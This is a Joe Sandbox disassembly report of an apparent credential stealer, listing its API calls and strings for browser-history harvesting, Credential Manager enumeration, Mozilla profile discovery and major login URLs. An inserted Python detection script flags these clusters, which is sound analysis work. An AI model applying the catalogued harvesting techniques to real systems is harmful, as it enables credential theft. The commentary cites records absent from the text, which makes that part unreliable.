                    • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                    • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                    • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                    APIs
                    • memset.MSVCRT ref: 0040C298
                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                    • wcschr.MSVCRT ref: 0040C324
                    • wcschr.MSVCRT ref: 0040C344
                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                    • GetLastError.KERNEL32 ref: 0040C373
                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                    • String ID: visited:
                    • API String ID: 1157525455-1702587658
                    • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                    • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                    Control-flow Graph (rendered graph not reproduced)
                    • Blocks 40e175-40e2a8: entry (call 40695d, call 406b90) -> memset at 40e1a7 -> loop body 40e1e8 (call 406e8f) -> 40e1fc (call 40dd50 * 2) -> 40e21f (call 40742e) -> 40e237 (call 40aae3) -> 40e244 (_snwprintf, call 40a8d0) -> 40e270 (call 406b53), which returns to 40e1e8; loop exit 40e283 (??3@YAXPAX@Z at 40e288, call 40aa04) -> 40e299 (call 4069a3); entry also branches straight to 40e299.
                    APIs
                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                    • memset.MSVCRT ref: 0040E1BD
                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                    • _snwprintf.MSVCRT ref: 0040E257
                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                    • API String ID: 3883404497-2982631422
                    • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                    • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                    APIs
                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                    • memset.MSVCRT ref: 0040BC75
                    • memset.MSVCRT ref: 0040BC8C
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                    • memcmp.MSVCRT ref: 0040BCD6
                    • memcpy.MSVCRT ref: 0040BD2B
                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                    • String ID:
                    • API String ID: 509814883-3916222277
                    • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                    • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                    Control-flow Graph (rendered graph not reproduced)
                    • Blocks 41837f-41851d: entry -> 4183c1 (call 418197) or 4183dc (call 418160) -> 418427 (call 41739b) -> CreateFileW at 418444 or CreateFileA at 41845f -> 418477 -> either 41847e (GetLastError, ??3@YAXPAX@Z) followed by a recursive call 41837f at 418497 or call 444706 at 4184b5, or 4184c2 -> 4184d5 (memset, call 418758) -> 418506 (??3@YAXPAX@Z) -> 418517.
                    APIs
                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                    • GetLastError.KERNEL32 ref: 0041847E
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile$??3@ErrorLast
                    • String ID: |A
                    • API String ID: 1407640353-1717621600
                    • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                    • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                    • String ID: r!A
                    • API String ID: 2791114272-628097481
                    • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                    • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                    APIs
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                    • _wcslwr.MSVCRT ref: 0040C817
                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                    • wcslen.MSVCRT ref: 0040C82C
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                    • API String ID: 62308376-4196376884
                    • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                    • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                    APIs
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                    • wcslen.MSVCRT ref: 0040BE06
                    • _wcsncoll.MSVCRT ref: 0040BE38
                    • memset.MSVCRT ref: 0040BE91
                    • memcpy.MSVCRT ref: 0040BEB2
                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                    • wcschr.MSVCRT ref: 0040BF24
                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                    • String ID:
                    • API String ID: 3191383707-0
                    • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                    • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                    APIs
                    • memset.MSVCRT ref: 00403CBF
                    • memset.MSVCRT ref: 00403CD4
                    • memset.MSVCRT ref: 00403CE9
                    • memset.MSVCRT ref: 00403CFE
                    • memset.MSVCRT ref: 00403D13
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 00403DDA
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                    • String ID: Waterfox$Waterfox\Profiles
                    • API String ID: 3527940856-11920434
                    • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                    • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                    APIs
                    • memset.MSVCRT ref: 00403E50
                    • memset.MSVCRT ref: 00403E65
                    • memset.MSVCRT ref: 00403E7A
                    • memset.MSVCRT ref: 00403E8F
                    • memset.MSVCRT ref: 00403EA4
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 00403F6B
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                    • API String ID: 3527940856-2068335096
                    • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                    • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                    APIs
                    • memset.MSVCRT ref: 00403FE1
                    • memset.MSVCRT ref: 00403FF6
                    • memset.MSVCRT ref: 0040400B
                    • memset.MSVCRT ref: 00404020
                    • memset.MSVCRT ref: 00404035
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 004040FC
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                    • API String ID: 3527940856-3369679110
                    • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                    • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
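The records above show the stealer's building blocks one function at a time: GetProcAddress resolving the psapi.dll process-enumeration exports at 413f4f, FindFirstUrlCacheEntryW walking the WinINet cache with the "visited:" prefix at 40c274 (and again through its caller at 40c817, which lowercases the URLs and carries the facebook/yahoo/google login URLs), CredEnumerateW dumping Windows Credential Manager at 40bde9, and the Firefox/SeaMonkey/Waterfox profile-path builders at 403c09, 403cbf, 403e50 and 403fe1. The script below is an added example, not Joe Sandbox tooling and not code from the sample: it parses the bullet layout of these records (assumed from what is shown on this page), pools each function's referenced strings with the literal call arguments, and reports which credential-theft API clusters each function exhibits and whether the APIs are called directly or only through a subcall. The rule names are mine; the sample input is constructed from bullets copied from six of the records above, and the last record (the LoadLibraryW helper at 0040A804) is left without an Opcode ID line because the page is cut off there.

```python
"""Flag credential-theft API clusters in Joe Sandbox function records.
Added example, not Joe Sandbox tooling and not code from the sample; it assumes
the bullet layout shown above and closes a record at its "Opcode ID" line."""
import re
from dataclasses import dataclass, field

API_RE = re.compile(                       # • Name.MODULE(args), ref: ADDR
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[\w?@]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")   # a$b$c
OPCODE_RE = re.compile(r"^\s*•\s*Opcode ID:\s*(?P<id>[0-9a-f]{64})")

# Constructed input: bullets copied from six records above; the last (the
# LoadLibraryW helper at 0040A804) is cut off on the page and has no Opcode ID.
SAMPLE = r"""• GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
• GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• String ID: visited:
• Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
• CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
• String ID:
• Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
• memset.MSVCRT ref: 00403FE1
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
• Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• _wcslwr.MSVCRT ref: 0040C817
• String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
• Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
• GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
• LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
"""


@dataclass
class Record:
    opcode_id: str = ""
    calls: list = field(default_factory=list)     # (name, args, direct_call)
    strings: list = field(default_factory=list)

    def api_names(self, direct_only=False):
        return {n for n, _, direct in self.calls if direct or not direct_only}


# (rule name, APIs that must all be called directly or via a subcall,
#  strings of which at least one must occur as a case-insensitive substring)
RULES = (
    ("runtime resolution of psapi process-enumeration APIs",
     frozenset({"GetProcAddress"}), ("psapi.dll",)),
    ("IE history harvesting via the WinINet URL cache",
     frozenset({"FindFirstUrlCacheEntryW", "FindNextUrlCacheEntryW"}), ("visited:",)),
    ("Windows Credential Manager enumeration", frozenset({"CredEnumerateW"}), ()),
    ("Mozilla-family profile directory discovery", frozenset(),
     (r"Mozilla\Firefox\Profiles", r"Mozilla\SeaMonkey\Profiles", r"Waterfox\Profiles")),
)


def parse_records(text):
    records, cur = [], Record()
    for line in text.splitlines():
        if m := API_RE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append((m["name"], args, m["sub"] is None))
        elif m := STRING_RE.match(line):
            cur.strings += [s for s in m["ids"].split("$") if s]
        elif m := OPCODE_RE.match(line):
            cur.opcode_id = m["id"]
            records.append(cur)
            cur = Record()
    if cur.calls or cur.strings:          # trailing record without an Opcode ID line
        records.append(cur)
    return records


def evaluate(records):
    """Return (record index, rule name, direct, evidence) for every rule hit."""
    findings = []
    for idx, rec in enumerate(records):
        # Referenced strings plus literal call arguments, so the "visited:"
        # prefix handed to FindFirstUrlCacheEntryW counts as evidence too.
        pool = rec.strings + [a for _, args, _ in rec.calls for a in args]
        for name, apis, patterns in RULES:
            if not apis <= rec.api_names():
                continue
            hits = list(dict.fromkeys(
                s for s in pool if any(p.lower() in s.lower() for p in patterns)))
            if patterns and not hits:
                continue
            direct = apis <= rec.api_names(direct_only=True)
            findings.append((idx, name, direct, sorted(apis) + hits))
    return findings


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for idx, rule, direct, evidence in evaluate(recs):
        tag = "direct" if direct else "via subcall"
        print(f"record {idx} [{recs[idx].opcode_id[:12] or 'no Opcode ID'}] "
              f"{tag}: {rule}; evidence: {', '.join(evidence)}")
```

Run it on the full text of a report page and the "via subcall" findings point at the orchestrating functions (here the 40c817 caller of the URL-cache walker), while the direct hits point at the leaf routines worth diffing against WebBrowserPassView; a function with no hit, such as the LoadLibraryW helper, is correctly left alone.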
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                    • API String ID: 3510742995-2641926074
                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                    APIs
                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                    • memset.MSVCRT ref: 004033B7
                    • memcpy.MSVCRT ref: 004033D0
                    • wcscmp.MSVCRT ref: 004033FC
                    • _wcsicmp.MSVCRT ref: 00403439
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                    • String ID: $0.@
                    • API String ID: 3030842498-1896041820
                    • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                    • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 2941347001-0
                    • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                    • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
